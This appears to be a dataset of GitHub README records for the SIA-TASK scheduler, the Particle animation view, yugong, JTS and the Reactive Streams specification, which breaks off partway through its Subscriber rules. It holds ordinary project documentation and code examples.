SIA-TASK借鉴微服务的设计思想,获取分布在每个任务执行器上的任务元数据,上传到任务注册中心。利用在线方式进行任务编排,可动态修改任务时钟,采用HTTP作为任务调度协议,统一使用JSON数据格式,由调度中心进行时钟解析,执行任务流程,进行任务通知。
Overview
---
SIA-TASK is an integrated non-invasive task scheduling solution. It collects task metadata and then visualizes and schedules the tasks. The scheduled tasks are monitored throughout the whole process. An ideal task scheduling model can be generated after simple and flexible configuration.
SIA-TASK collects task metadata on all executers and upload the data to the registry. The tasks are scheduled online using JSON with HTTP as the protocol. The scheduling center parses the clock, executes tasks and sends task notifications.
关键术语
---
* 任务(Task): 基本执行单元,执行器对外暴露的一个HTTP调用接口;
* 作业(Job): 由一个或者多个存在相互逻辑关系(串行/并行)的任务组成,任务调度中心调度的最小单位;
* 计划(Plan): 由若干个顺序执行的作业组成,每个作业都有自己的执行周期,计划没有执行周期;
* 任务调度中心(Scheduler): 根据每个的作业的执行周期进行调度,即按照计划、作业、任务的逻辑进行HTTP请求;
* 任务编排中心(Config): 编排中心使用任务来创建计划和作业;
* 任务执行器(Executer): 接收HTTP请求进行业务逻辑的执行;
* Hunter:Spring项目扩展包,负责执行器中的任务抓取,上传注册中心,业务可依赖该组件进行Task编写。
Terms
---
* Task: the basic execution unit and the HTTP call interface
* Job: the minimum scheduled unit that is composed of one or more (serial/concurrent) tasks
* Plan: the composition of several serial jobs with no execution cycle
* Scheduler: sends HTTP requests based on the logic of the plans, jobs and tasks
* Config: creates plans and jobs with tasks
* Executer: receives HTTP requests and executes the business logic
* Hunter: fetches tasks, uploads metadata and scripts business tasks
微服务任务调度平台的特性
---
* 基于注解自动抓取任务,在暴露成HTTP服务的方法上加入@OnlineTask注解,@OnlineTask会自动抓取方法所在的IP地址,端口,请求路径,请求方法,请求参数格式等信息上传到任务注册中心(zookeeper),并同步写入持久化存储中,此方法即任务;
* 基于注解无侵入多线程控制,单一任务实例必须保持单线程运行,任务调度框架自动拦截@OnlineTask注解进行单线程运行控制,保持在一个任务运行时不会被再次调度。而且整个控制过程对开发者完全无感知。
* 调度器自适应任务分配,任务执行过程中出现失败,异常时。可以根据任务定制的策略进行多点重新唤醒任务,保证任务的不间断执行。
* 高度灵活任务编排模式,SIA-TASK的设计思想是以任务为原子,把多个任务按照执行的关系组合起来形成一个作业。同时运行时分为任务调度中心和任务编排中心,使得作业的调度和作业的编排分隔开来,互不影响。在我们需要调整作业的流程时,只需要在编排中心进行处理即可。同时编排中心支持任务按照串行,并行,分支等方式组织关系。在相同任务不同任务实例时,也支持多种调度方式进行处理。
Features
---
* Annotation-based automatic task fetching. Add @OnlineTask to the HTTP method. @OnlineTask would fetch and upload the IP address, port, request path, and request parameter format to the registry (Zookeeper) while writing the information into the persistent storage. A minimal sketch follows this list.
* Annotation-based non-invasive multi-threading control. The scheduler automatically intercepts @OnlineTask for single-threading control and ensures that the running task would not be scheduled again. The whole process is non-invasive.
* Self-adaptive task scheduling. Tasks can be woken up based on the custom strategies when execution failure happens.
* Flexible task configuration. SIA-TASK is designed to group several logically related tasks into a job. The Scheduler and the Config schedules and configures jobs independently. The Config allows tasks to be organized in series, concurrently or as branches. Instances of the same task can be scheduled differently.
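A minimal executer-side sketch, assuming a Spring MVC controller and the @OnlineTask annotation from the Hunter component (the annotation attribute and return value shown here are illustrative, not the exact contract):
```java
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseBody;
// The @OnlineTask import is omitted here; the annotation ships with the SIA-TASK Hunter dependency.

@Controller
public class DemoTaskController {

    // @OnlineTask marks this HTTP endpoint as a task; its metadata (IP, port,
    // path, method, parameter format) is fetched and uploaded to the registry.
    @OnlineTask(description = ""demo task"")   // the attribute name is an assumption
    @RequestMapping(value = ""/demoTask"", method = RequestMethod.POST)
    @ResponseBody
    public String demoTask(@RequestBody String input) {
        // Business logic goes here; SIA-TASK exchanges JSON over HTTP,
        // so a real task would return a JSON string describing the result.
        return ""success"";
    }
}
```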
微服务任务调度平台设计
---
SIA-TASK主要分为五个部分:
* 任务执行器
* 任务调度中心
* 任务编排中心
* 任务注册中心(zookeeper)
* 持久存储(Mysql)
SIA-TASK includes the following components:
* Executer
* Scheduler
* Config
* Registry (Zookeeper)
* Persistent storage (MySQL)
![逻辑架构图](docs/images/sia_task1.png)
SIA-TASK的主要运行逻辑:
1. 通过注解抓取任务执行器中的任务上报到任务注册中心
2. 任务编排中心从任务注册中心获取数据进行编排保存入持久化存储
3. 任务调度中心从持久化存储获取调度信息
4. 任务调度中心按照调度逻辑访问任务执行器
The main runtime logic of SIA-TASK:
1. Fetch and upload annotated tasks to the registry
2. The Config obtains data from the registry for scheduling and persistent storage
3. The Scheduler acquires data from the persistent storage
4. The Scheduler accesses the task scheduler following the scheduling logic
![逻辑架构图](docs/images/sia_task2.png)
UI preview
---
首页提供多维度监控
* 调度器信息:展示调度器信息(负载能力,预警值),以及作业分布情况。
* 调度信息:展示调度中心触发的调度次数,作业、任务多维度调度统计。
* 对接项目统计:对使用项目的系统进行统计,作业个数,任务个数等等。
Homepage
* Scheduler: loading capacity, alarm value and job distribution
* Scheduling: scheduling frequency, job metrics and task metrics
* Active users: job count and task count of active users
![首页](docs/images/index.png)
调度监控提供对已提交的作业进行实时监控展示
* 作业状态实时监控:以项目组为单位面板,展示作业运行时状态。
* 实时日志关联:可以通过涂色状态图标进行日志实时关联展示。
Scheduling Monitor: real-time monitoring over submitted jobs
* Real-time job monitoring: runtime metrics of jobs by project group
* Real-time log correlation: logs can be correlated and displayed in real time via the colored status icons.
![调度监控](docs/images/scheduling-monitoring.png)
任务管理:提供任务元数据的相关操作
* 任务元数据录入:手动模式的任务,可在此进行录入。
* 任务连通性测试:提供任务连通性功能测试。
* 任务元数据其他操作:修改,删除。
Task Manager: task metadata operation
* Metadata entry: enter the metadata of manual tasks
* Connectivity test: test the connectivity of tasks
* Modification and deletion
![Task管理](docs/images/Task-management.png)
![Task管理](docs/images/user-handbook_taskMg5.png)
Job管理:提供作业相关操作
* 任务编排:进行作业的编排。
* 发布作业: 作业的创建,修改,以及发布。
* 级联设置:提供存在时间依赖的作业设置。
Job Manager: job operations
* Task configuration: configure jobs
* Job release: create, modify and release jobs
* Cascading setting: set time-dependent jobs
![Job管理](docs/images/Job-management.png)
日志管理
Log Manager
![Job管理](docs/images/user-handbook_log1.png)
Source code
---
* [https://github.com/siaorg/sia-task](https://github.com/siaorg/sia-task)
## Other notes
### Build requirements
* JDK 1.8 or later is recommended.
### Version
* SIA-TASK 1.0.0 is recommended.
### License
* SIA-TASK uses the Apache 2.0 license.
### Related resources
## Other SIA open-source products:
+ [Microservice routing gateway](https://github.com/siaorg/sia-gateway)
+ [RabbitMQ queue service PLUS](https://github.com/siaorg/sia-rabbitmq-plus)
(more to come)
"
JeasonWong/Particle,master,1415,169,2016-08-29T09:21:15Z,1722,8,It's a cool animation which can use in splash or somewhere else.,,"## What's Particle ?
It's a cool animation which can be used in a splash screen or anywhere else.
## Demo
![Markdown](https://raw.githubusercontent.com/jeasonwong/Particle/master/screenshots/particle.gif)
## Article
[手摸手教你用Canvas实现简单粒子动画](http://www.wangyuwei.me/2016/08/29/%E6%89%8B%E6%91%B8%E6%89%8B%E6%95%99%E4%BD%A0%E5%AE%9E%E7%8E%B0%E7%AE%80%E5%8D%95%E7%B2%92%E5%AD%90%E5%8A%A8%E7%94%BB/)
## Attributes
|name|format|description|中文解释
|:---:|:---:|:---:|:---:|
| pv_host_text | string |set left host text|设置左边主文案
| pv_host_text_size | dimension |set host text size|设置主文案的大小
| pv_particle_text | string |set right particle text|设置右边粒子上的文案
| pv_particle_text_size | dimension |set particle text size|设置粒子上文案的大小
| pv_text_color | color |set host text color|设置左边主文案颜色
|pv_background_color|color|set background color|设置背景颜色
| pv_text_anim_time | integer |set particle text duration|设置粒子上文案的运动时间
| pv_spread_anim_time | integer |set particle text spread duration|设置粒子上文案的伸展时间
|pv_host_text_anim_time|integer|set host text displacement duration|设置左边主文案的位移时间
## Usage
#### Define the view in your layout xml:
```xml
```
#### Start animation :
```java
mParticleView.startAnim();
```
#### Add animation listener to listen the end callback :
```java
mParticleView.setOnParticleAnimListener(new ParticleView.ParticleAnimListener() {
@Override
public void onAnimationEnd() {
Toast.makeText(MainActivity.this, ""Animation is End"", Toast.LENGTH_SHORT).show();
}
});
```
## Import
Step 1. Add it in your project's build.gradle at the end of repositories:
```gradle
repositories {
maven {
url 'https://dl.bintray.com/wangyuwei/maven'
}
}
```
Step 2. Add the dependency:
```gradle
dependencies {
compile 'me.wangyuwei:ParticleView:1.0.4'
}
```
### About Me
[Weibo](http://weibo.com/WongYuwei)
[Blog](http://www.wangyuwei.me)
### QQ Group (discussion welcome)
**479729938**
## **License**
```license
Copyright [2016] [JeasonWong of copyright owner]
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
```"
alibaba/yugong,master,2480,953,2016-03-02T07:31:00Z,2415,102,"阿里巴巴去Oracle数据迁移同步工具(全量+增量,目标支持MySQL/DRDS)",,"## Background
In 2008, Alibaba began trying to run its business on MySQL and built MySQL-related middleware and tools, Cobar/TDDL (now the Alibaba Cloud DRDS product), to solve the scalability problems a single Oracle instance could not address. This also set off a wave of projects to move away from IOE (IBM minicomputers, Oracle databases, EMC storage). The yugong project was born in that effort; its goal is to help users migrate data from Oracle to MySQL, an important step in leaving IOE behind.
## About the project
Name: yugong
Meaning: 愚公移山 (the foolish old man who moved the mountains)
Language: pure Java
Purpose: database migration (currently mainly Oracle / MySQL / DRDS)
## Migration process
The whole data migration is split into two parts:
1. Full migration
2. Incremental migration
![](https://camo.githubusercontent.com/9a9cc09c5a7598239da20433857be61c54481b9c/687474703a2f2f646c322e69746579652e636f6d2f75706c6f61642f6174746163686d656e742f303131352f343531312f31306334666134632d626634342d333165352d623531312d6231393736643164373636392e706e67)
Process:
1. Collect incremental data (create incremental materialized views for the Oracle tables)
2. Run the full copy
3. Run the incremental copy (data verification can run in parallel)
4. Stop writes on the source database and switch over to the new database
## Architecture
![](http://dl2.iteye.com/upload/attachment/0115/5473/8532d838-d4b2-371b-af9f-829d4127b1b8.png)
Notes:
1. One JVM container runs multiple instances; each instance corresponds to the migration task of a single table
2. An instance consists of three parts
a. extractor (extracts data from the source database; there are full and incremental implementations)
b. translator (applies custom transformations to the source data to match the target database)
c. applier (writes data to the target database; there are full, incremental and compare implementations)
## Design
[DevDesign](https://github.com/alibaba/yugong/wiki/DevDesign)
## Quick start
[QuickStart](https://github.com/alibaba/yugong/wiki/QuickStart)
## Operations guide
[AdminGuide](https://github.com/alibaba/yugong/wiki/AdminGuide)
## Performance
[Performance](https://github.com/alibaba/yugong/wiki/Performance)
## Resources
1. A short introduction to yugong: [ppt](https://github.com/alibaba/yugong/blob/master/docs/yugong_Intro.ppt?raw=true)
2. [DRDS, the distributed relational database service](https://www.aliyun.com/product/drds)
(an evolution of Alibaba's Cobar/TDDL; essentially MySQL sharding, i.e. splitting databases and tables)
## Communication
1. See the wiki home page
"
locationtech/jts,master,1855,423,2016-01-25T18:08:41Z,40590,199,The JTS Topology Suite is a Java library for creating and manipulating vector geometry.,computational-geometry geometric-algorithms geometry geometry-algorithms geometry-library gis java java-library jts jts-topology-suite ogc ogc-wkt triangulation voronoi,"JTS Topology Suite
==================
The JTS Topology Suite is a Java library for creating and manipulating vector geometry. It also provides a comprehensive set of geometry test cases, and the TestBuilder GUI application for working with and visualizing geometry and JTS functions.
![JTS logo](jts_logo.png)
[![Travis Build Status](https://api.travis-ci.org/locationtech/jts.svg)](http://travis-ci.org/locationtech/jts) [![GitHub Action Status](https://github.com/locationtech/jts/workflows/GitHub%20CI/badge.svg)](https://github.com/locationtech/jts/actions)
[![Join the chat at https://gitter.im/locationtech/jts](https://badges.gitter.im/locationtech/jts.svg)](https://gitter.im/locationtech/jts?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
JTS is a project in the [LocationTech](http://www.locationtech.org) working group of the Eclipse Foundation.
![LocationTech](locationtech_mark.png)
## Requirements
Currently JTS targets Java 1.8 and above.
## Resources
### Code
* [GitHub Repo](https://github.com/locationtech/jts)
* [Maven Central group](https://mvnrepository.com/artifact/org.locationtech.jts)
### Websites
* [LocationTech Home](https://locationtech.org/projects/technology.jts)
* [GitHub web site](https://locationtech.github.io/jts/)
### Communication
* [Mailing List](https://accounts.eclipse.org/mailing-list/jts-dev)
* [Gitter Channel](https://gitter.im/locationtech/jts)
### Forums
* [Stack Overflow](https://stackoverflow.com/questions/tagged/jts)
* [GIS Stack Exchange](https://gis.stackexchange.com/questions/tagged/jts-topology-suite)
## License
JTS is open source software. It is dual-licensed under:
* [Eclipse Public License 2.0](https://www.eclipse.org/legal/epl-v20.html)
* [Eclipse Distribution License 1.0](http://www.eclipse.org/org/documents/edl-v10.php) (a BSD Style License)
See also:
* [License details](LICENSES.md)
* Licensing [FAQ](FAQ-LICENSING.md)
## Documentation
* [**Javadoc**](https://locationtech.github.io/jts/javadoc) for the latest version of JTS
* [**FAQ**](https://locationtech.github.io/jts/jts-faq.html) - Frequently Asked Questions
* [**User Guide**](USING.md) - Installing and using JTS
* [**Tools**](doc/TOOLS.md) - Guide to tools included with JTS
* [**Developing Guide**](DEVELOPING.md) - how to build and develop for JTS
* [**Upgrade Guide**](MIGRATION.md) - How to migrate from previous versions of JTS
## History
* [**Version History**](https://github.com/locationtech/jts/blob/master/doc/JTS_Version_History.md)
* History from the previous JTS SourceForge repo is in the branch [`_old/history`](https://github.com/locationtech/jts/tree/_old/history)
* Older versions of JTS can be found on SourceForge
* There is an archive of distros of older versions [here](https://github.com/dr-jts/jts-versions)
## Contributing
If you are interested in contributing to JTS please read the [**Contributing Guide**](CONTRIBUTING.md).
## Downstream Projects
### Derivatives (ports to other languages)
* [**GEOS**](https://trac.osgeo.org/geos) - C++
* [**NetTopologySuite**](https://github.com/NetTopologySuite/NetTopologySuite) - .NET
* [**JSTS**](https://github.com/bjornharrtell/jsts) - JavaScript
* [**dart_jts**](https://github.com/moovida/dart_jts) - Dart
### Via GEOS
* [**Shapely**](https://github.com/Toblerity/Shapely) - Python wrapper of GEOS
* [**R-GEOS**](https://cran.r-project.org/web/packages/rgeos/index.html) - R wrapper of GEOS
* [**rgeo**](https://github.com/rgeo/rgeo) - Ruby wrapper of GEOS
* [**GEOSwift**](https://github.com/GEOSwift/GEOSwift)- Swift library using GEOS
There are many projects using GEOS - for a list see the [GEOS wiki](https://trac.osgeo.org/geos/wiki/Applications).
"
reactive-streams/reactive-streams-jvm,master,4744,521,2014-02-28T13:16:15Z,1846,28,Reactive Streams Specification for the JVM,,"# Reactive Streams #
The purpose of Reactive Streams is to provide a standard for asynchronous stream processing with non-blocking backpressure.
The latest release is available on Maven Central as
```xml
<dependency>
  <groupId>org.reactivestreams</groupId>
  <artifactId>reactive-streams</artifactId>
  <version>1.0.4</version>
</dependency>
<dependency>
  <groupId>org.reactivestreams</groupId>
  <artifactId>reactive-streams-tck</artifactId>
  <version>1.0.4</version>
  <scope>test</scope>
</dependency>
```
## Goals, Design and Scope ##
Handling streams of data—especially “live” data whose volume is not predetermined—requires special care in an asynchronous system. The most prominent issue is that resource consumption needs to be carefully controlled such that a fast data source does not overwhelm the stream destination. Asynchrony is needed in order to enable the parallel use of computing resources, on collaborating network hosts or multiple CPU cores within a single machine.
The main goal of Reactive Streams is to govern the exchange of stream data across an asynchronous boundary – think passing elements on to another thread or thread-pool — while ensuring that the receiving side is not forced to buffer arbitrary amounts of data. In other words, backpressure is an integral part of this model in order to allow the queues which mediate between threads to be bounded. The benefits of asynchronous processing would be negated if the backpressure signals were synchronous (see also the [Reactive Manifesto](http://reactivemanifesto.org/)), therefore care has been taken to mandate fully non-blocking and asynchronous behavior of all aspects of a Reactive Streams implementation.
It is the intention of this specification to allow the creation of many conforming implementations, which by virtue of abiding by the rules will be able to interoperate smoothly, preserving the aforementioned benefits and characteristics across the whole processing graph of a stream application.
It should be noted that the precise nature of stream manipulations (transformation, splitting, merging, etc.) is not covered by this specification. Reactive Streams are only concerned with mediating the stream of data between different [API Components](#api-components). In their development care has been taken to ensure that all basic ways of combining streams can be expressed.
In summary, Reactive Streams is a standard and specification for Stream-oriented libraries for the JVM that
- process a potentially unbounded number of elements
- in sequence,
- asynchronously passing elements between components,
- with mandatory non-blocking backpressure.
The Reactive Streams specification consists of the following parts:
***The API*** specifies the types to implement Reactive Streams and achieve interoperability between different implementations.
***The Technology Compatibility Kit (TCK)*** is a standard test suite for conformance testing of implementations.
Implementations are free to implement additional features not covered by the specification as long as they conform to the API requirements and pass the tests in the TCK.
### API Components ###
The API consists of the following components that are required to be provided by Reactive Stream implementations:
1. Publisher
2. Subscriber
3. Subscription
4. Processor
A *Publisher* is a provider of a potentially unbounded number of sequenced elements, publishing them according to the demand received from its Subscriber(s).
In response to a call to `Publisher.subscribe(Subscriber)` the possible invocation sequences for methods on the `Subscriber` are given by the following protocol:
```
onSubscribe onNext* (onError | onComplete)?
```
This means that `onSubscribe` is always signalled,
followed by a possibly unbounded number of `onNext` signals (as requested by `Subscriber`) followed by an `onError` signal if there is a failure, or an `onComplete` signal when no more elements are available—all as long as the `Subscription` is not cancelled.
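To make the protocol concrete, here is a minimal, purely illustrative `Subscriber` that requests one element at a time and stops reacting after a terminal signal:
```java
import org.reactivestreams.Subscriber;
import org.reactivestreams.Subscription;

public class OneAtATimeSubscriber<T> implements Subscriber<T> {
    private Subscription subscription;

    @Override
    public void onSubscribe(Subscription s) {
        this.subscription = s;      // onSubscribe is always signalled first
        s.request(1);               // signal initial demand
    }

    @Override
    public void onNext(T element) {
        System.out.println(""received: "" + element);
        subscription.request(1);    // ask for the next element
    }

    @Override
    public void onError(Throwable t) {
        t.printStackTrace();        // terminal state: no further signals will follow
    }

    @Override
    public void onComplete() {
        System.out.println(""done""); // terminal state
    }
}
```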
#### NOTES
- The specifications below use binding words in capital letters from https://www.ietf.org/rfc/rfc2119.txt
### Glossary
| Term | Definition |
| ------------------------- | ------------------------------------------------------------------------------------------------------ |
| Signal | As a noun: one of the `onSubscribe`, `onNext`, `onComplete`, `onError`, `request(n)` or `cancel` methods. As a verb: calling/invoking a signal. |
| Demand | As a noun, the aggregated number of elements requested by a Subscriber which is yet to be delivered (fulfilled) by the Publisher. As a verb, the act of `request`-ing more elements. |
| Synchronous(ly) | Executes on the calling Thread. |
| Return normally | Only ever returns a value of the declared type to the caller. The only legal way to signal failure to a `Subscriber` is via the `onError` method.|
| Responsivity | Readiness/ability to respond. In this document used to indicate that the different components should not impair each others ability to respond. |
| Non-obstructing | Quality describing a method which is as quick to execute as possible—on the calling thread. This means, for example, avoids heavy computations and other things that would stall the caller´s thread of execution. |
| Terminal state | For a Publisher: When `onComplete` or `onError` has been signalled. For a Subscriber: When an `onComplete` or `onError` has been received.|
| NOP | Execution that has no detectable effect to the calling thread, and can as such safely be called any number of times.|
| Serial(ly) | In the context of a [Signal](#term_signal), non-overlapping. In the context of the JVM, calls to methods on an object are serial if and only if there is a happens-before relationship between those calls (implying also that the calls do not overlap). When the calls are performed asynchronously, coordination to establish the happens-before relationship is to be implemented using techniques such as, but not limited to, atomics, monitors, or locks. |
| Thread-safe | Can be safely invoked synchronously, or asychronously, without requiring external synchronization to ensure program correctness. |
### SPECIFICATION
#### 1. Publisher ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Publisher.java))
```java
public interface Publisher<T> {
    public void subscribe(Subscriber<? super T> s);
}
```
| ID | Rule |
| ------------------------- | ------------------------------------------------------------------------------------------------------ |
| 1 | The total number of `onNext`´s signalled by a `Publisher` to a `Subscriber` MUST be less than or equal to the total number of elements requested by that `Subscriber`´s `Subscription` at all times. |
| [:bulb:](#1.1 ""1.1 explained"") | *The intent of this rule is to make it clear that Publishers cannot signal more elements than Subscribers have requested. There’s an implicit, but important, consequence to this rule: Since demand can only be fulfilled after it has been received, there’s a happens-before relationship between requesting elements and receiving elements.* |
| 2 | A `Publisher` MAY signal fewer `onNext` than requested and terminate the `Subscription` by calling `onComplete` or `onError`. |
| [:bulb:](#1.2 ""1.2 explained"") | *The intent of this rule is to make it clear that a Publisher cannot guarantee that it will be able to produce the number of elements requested; it simply might not be able to produce them all; it may be in a failed state; it may be empty or otherwise already completed.* |
| 3 | `onSubscribe`, `onNext`, `onError` and `onComplete` signaled to a `Subscriber` MUST be signaled [serially](#term_serially). |
| [:bulb:](#1.3 ""1.3 explained"") | *The intent of this rule is to permit the signalling of signals (including from multiple threads) if and only if a happens-before relation between each of the signals is established.* |
| 4 | If a `Publisher` fails it MUST signal an `onError`. |
| [:bulb:](#1.4 ""1.4 explained"") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers if it detects that it cannot proceed—Subscribers must be given a chance to clean up resources or otherwise deal with the Publisher´s failures.* |
| 5 | If a `Publisher` terminates successfully (finite stream) it MUST signal an `onComplete`. |
| [:bulb:](#1.5 ""1.5 explained"") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers that it has reached a [terminal state](#term_terminal_state)—Subscribers can then act on this information; clean up resources, etc.* |
| 6 | If a `Publisher` signals either `onError` or `onComplete` on a `Subscriber`, that `Subscriber`’s `Subscription` MUST be considered cancelled. |
| [:bulb:](#1.6 ""1.6 explained"") | *The intent of this rule is to make sure that a Subscription is treated the same no matter if it was cancelled, the Publisher signalled onError or onComplete.* |
| 7 | Once a [terminal state](#term_terminal_state) has been signaled (`onError`, `onComplete`) it is REQUIRED that no further signals occur. |
| [:bulb:](#1.7 ""1.7 explained"") | *The intent of this rule is to make sure that onError and onComplete are the final states of an interaction between a Publisher and Subscriber pair.* |
| 8 | If a `Subscription` is cancelled its `Subscriber` MUST eventually stop being signaled. |
| [:bulb:](#1.8 ""1.8 explained"") | *The intent of this rule is to make sure that Publishers respect a Subscriber’s request to cancel a Subscription when Subscription.cancel() has been called. The reason for **eventually** is because signals can have propagation delay due to being asynchronous.* |
| 9 | `Publisher.subscribe` MUST call `onSubscribe` on the provided `Subscriber` prior to any other signals to that `Subscriber` and MUST [return normally](#term_return_normally), except when the provided `Subscriber` is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way to signal failure (or reject the `Subscriber`) is by calling `onError` (after calling `onSubscribe`). |
| [:bulb:](#1.9 ""1.9 explained"") | *The intent of this rule is to make sure that `onSubscribe` is always signalled before any of the other signals, so that initialization logic can be executed by the Subscriber when the signal is received. Also `onSubscribe` MUST only be called at most once, [see [2.12](#2.12)]. If the supplied `Subscriber` is `null`, there is nowhere else to signal this but to the caller, which means a `java.lang.NullPointerException` must be thrown. Examples of possible situations: A stateful Publisher can be overwhelmed, bounded by a finite number of underlying resources, exhausted, or in a [terminal state](#term_terminal_state).* |
| 10 | `Publisher.subscribe` MAY be called as many times as wanted but MUST be with a different `Subscriber` each time [see [2.12](#2.12)]. |
| [:bulb:](#1.10 ""1.10 explained"") | *The intent of this rule is to have callers of `subscribe` be aware that a generic Publisher and a generic Subscriber cannot be assumed to support being attached multiple times. Furthermore, it also mandates that the semantics of `subscribe` must be upheld no matter how many times it is called.* |
| 11 | A `Publisher` MAY support multiple `Subscriber`s and decides whether each `Subscription` is unicast or multicast. |
| [:bulb:](#1.11 ""1.11 explained"") | *The intent of this rule is to give Publisher implementations the flexibility to decide how many, if any, Subscribers they will support, and how elements are going to be distributed.* |
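To make the rules above more tangible, the following is a minimal, illustrative sketch of a `Publisher` that replays a fixed list of elements. It is not part of the specification, the class name `ListPublisher` is hypothetical, and concurrency concerns are simplified (requests are assumed to be made serially, per rule 2.7):
```java
import org.reactivestreams.Publisher;
import org.reactivestreams.Subscriber;
import org.reactivestreams.Subscription;

import java.util.List;
import java.util.concurrent.atomic.AtomicLong;

// Hypothetical, simplified Publisher that replays a fixed List.
// It illustrates rule 1.1 (never signal more onNext than requested),
// rule 1.5 (signal onComplete on successful termination) and
// rule 1.9 (onSubscribe first; NullPointerException on a null Subscriber).
public final class ListPublisher<T> implements Publisher<T> {
    private final List<T> elements;

    public ListPublisher(List<T> elements) { this.elements = elements; }

    @Override
    public void subscribe(Subscriber<? super T> subscriber) {
        if (subscriber == null) throw new NullPointerException(); // rule 1.9
        subscriber.onSubscribe(new Subscription() {
            private final AtomicLong demand = new AtomicLong();
            private int index;
            private volatile boolean done;

            @Override
            public void request(long n) {
                if (done) return;                        // rule 3.6: NOP after cancellation or termination
                if (n <= 0) {                            // rule 3.9 (a real implementation SHOULD add an explanatory message)
                    done = true;
                    subscriber.onError(new IllegalArgumentException());
                    return;
                }
                // Accumulate demand (rule 3.8); a full implementation would also cap it at Long.MAX_VALUE (rule 3.17).
                if (demand.getAndAdd(n) > 0) return;     // a drain loop is already emitting
                while (!done && demand.get() > 0 && index < elements.size()) {
                    subscriber.onNext(elements.get(index++)); // never exceeds demand (rule 1.1)
                    demand.decrementAndGet();
                }
                if (!done && index == elements.size()) {
                    done = true;
                    subscriber.onComplete();             // rule 1.5
                }
            }

            @Override
            public void cancel() { done = true; }        // rules 3.5/3.7: idempotent, returns normally
        });
    }
}
```
With such a Publisher, no element is emitted until the Subscriber signals demand via the `Subscription` it receives in `onSubscribe`.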
#### 2. Subscriber ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscriber.java))
```java
public interface Subscriber<T> {
    public void onSubscribe(Subscription s);
    public void onNext(T t);
    public void onError(Throwable t);
    public void onComplete();
}
```
| ID | Rule |
| ------------------------- | ------------------------------------------------------------------------------------------------------ |
| 1 | A `Subscriber` MUST signal demand via `Subscription.request(long n)` to receive `onNext` signals. |
| [:bulb:](#2.1 ""2.1 explained"") | *The intent of this rule is to establish that it is the responsibility of the Subscriber to decide when and how many elements it is able and willing to receive. To avoid signal reordering caused by reentrant Subscription methods, it is strongly RECOMMENDED for synchronous Subscriber implementations to invoke Subscription methods at the very end of any signal processing. It is RECOMMENDED that Subscribers request the upper limit of what they are able to process, as requesting only one element at a time results in an inherently inefficient ""stop-and-wait"" protocol.* |
| 2 | If a `Subscriber` suspects that its processing of signals will negatively impact its `Publisher`´s responsivity, it is RECOMMENDED that it asynchronously dispatches its signals. |
| [:bulb:](#2.2 ""2.2 explained"") | *The intent of this rule is that a Subscriber should [not obstruct](#term_non-obstructing) the progress of the Publisher from an execution point-of-view. In other words, the Subscriber should not starve the Publisher from receiving CPU cycles.* |
| 3 | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST NOT call any methods on the `Subscription` or the `Publisher`. |
| [:bulb:](#2.3 ""2.3 explained"") | *The intent of this rule is to prevent cycles and race-conditions—between Publisher, Subscription and Subscriber—during the processing of completion signals.* |
| 4 | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST consider the Subscription cancelled after having received the signal. |
| [:bulb:](#2.4 ""2.4 explained"") | *The intent of this rule is to make sure that Subscribers respect a Publisher’s [terminal state](#term_terminal_state) signals. A Subscription is simply not valid anymore after an onComplete or onError signal has been received.* |
| 5 | A `Subscriber` MUST call `Subscription.cancel()` on the given `Subscription` after an `onSubscribe` signal if it already has an active `Subscription`. |
| [:bulb:](#2.5 ""2.5 explained"") | *The intent of this rule is to prevent two, or more, separate Publishers from trying to interact with the same Subscriber. Enforcing this rule means that resource leaks are prevented since extra Subscriptions will be cancelled. Failure to conform to this rule may lead to violations of Publisher rule 1, amongst others. Such violations can lead to hard-to-diagnose bugs.* |
| 6 | A `Subscriber` MUST call `Subscription.cancel()` if the `Subscription` is no longer needed. |
| [:bulb:](#2.6 ""2.6 explained"") | *The intent of this rule is to establish that Subscribers cannot just throw Subscriptions away when they are no longer needed, they have to call `cancel` so that resources held by that Subscription can be safely, and timely, reclaimed. An example of this would be a Subscriber which is only interested in a specific element, which would then cancel its Subscription to signal its completion to the Publisher.* |
| 7 | A Subscriber MUST ensure that all calls on its Subscription's request and cancel methods are performed [serially](#term_serially). |
| [:bulb:](#2.7 ""2.7 explained"") | *The intent of this rule is to permit the calling of the request and cancel methods (including from multiple threads) if and only if a [serial](#term_serially) relation between each of the calls is established.* |
| 8 | A `Subscriber` MUST be prepared to receive one or more `onNext` signals after having called `Subscription.cancel()` if there are still requested elements pending [see [3.12](#3.12)]. `Subscription.cancel()` does not guarantee to perform the underlying cleaning operations immediately. |
| [:bulb:](#2.8 ""2.8 explained"") | *The intent of this rule is to highlight that there may be a delay between calling `cancel` and the Publisher observing that cancellation.* |
| 9 | A `Subscriber` MUST be prepared to receive an `onComplete` signal with or without a preceding `Subscription.request(long n)` call. |
| [:bulb:](#2.9 ""2.9 explained"") | *The intent of this rule is to establish that completion is unrelated to the demand flow—this allows for streams which complete early, and obviates the need to *poll* for completion.* |
| 10 | A `Subscriber` MUST be prepared to receive an `onError` signal with or without a preceding `Subscription.request(long n)` call. |
| [:bulb:](#2.10 ""2.10 explained"") | *The intent of this rule is to establish that Publisher failures may be completely unrelated to signalled demand. This means that Subscribers do not need to poll to find out if the Publisher will not be able to fulfill its requests.* |
| 11 | A `Subscriber` MUST make sure that all calls on its [signal](#term_signal) methods happen-before the processing of the respective signals. I.e. the Subscriber must take care of properly publishing the signal to its processing logic. |
